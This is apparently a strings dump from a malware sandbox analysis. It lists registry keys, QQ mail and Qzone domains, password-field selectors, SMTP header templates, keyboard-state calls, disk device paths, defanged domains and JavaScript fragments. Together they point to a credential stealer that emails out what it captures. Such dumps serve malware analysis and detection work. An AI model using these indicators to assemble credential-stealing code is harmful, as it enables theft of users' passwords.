javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
type=password
type=password
[password]
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
user.qzone.qq.com
mail.qq.com
mail.qq.com
onkeyup
onkeyup
type='password'
type='password'
type="password"
type="password"
, 1, , ,
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
var jie = document.createStyleSheet();jie.addRule('html','
').value="
').value="
document.getElementById('
document.getElementById('
LocationURL
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
SysShadow.Menu
SysShadow.Menu
Microsoft.XMLDOM
Microsoft.XMLDOM
14:00~16:00
14:00~16:00
12:00-19:00
12:00-19:00
1.2.18
1.2.18
%*.*f
%*.*f
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
WSOCK32.dll
WSOCK32.dll
msscript.ocx
msscript.ocx
VVV.dywt.com.cn
VVV.dywt.com.cn
USER32.DLL
USER32.DLL
\\.\Smartvsd
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
(*.htm;*.html)|*.htm;*.html
its:%s::%s
its:%s::%s
(*.avi)|*.avi
(*.avi)|*.avi
WPFT532.CNV
WPFT532.CNV
WPFT632.CNV
WPFT632.CNV
EXCEL32.CNV
EXCEL32.CNV
write32.wpc
write32.wpc
Windows Write
Windows Write
mswrd632.wpc
mswrd632.wpc
Word for Windows 6.0
Word for Windows 6.0
wword5.cnv
wword5.cnv
Word for Windows 5.0
Word for Windows 5.0
mswrd832.cnv
mswrd832.cnv
mswrd632.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
Word 6.0/95 for Windows & Macintosh
html32.cnv
html32.cnv
.PAVCOleException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
c:\%original file name%.exe
c:\%original file name%.exe
GetKeyboardState
GetKeyboardState
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
1.0.15.507
1.0.15.507
T%Program Files%\NamuADLook.dll
T%Program Files%\NamuADLook.dll
mscoree.dll
mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
1.3.6.1
(*.*)
(*.*)
1.0.0.0
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
%original file name%.exe_3308_rwx_01FE0000_00013000:
TcService.exe_2764:
T%Program Files%\NamuADLook.dll
T%Program Files%\NamuADLook.dll
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
1.3.6.1
(*.*)
(*.*)
1.0.0.0
1.0.0.0
sesvcs_963_56089.exe_1956:
%original file name%.exe_3308_rwx_10001000_00033000: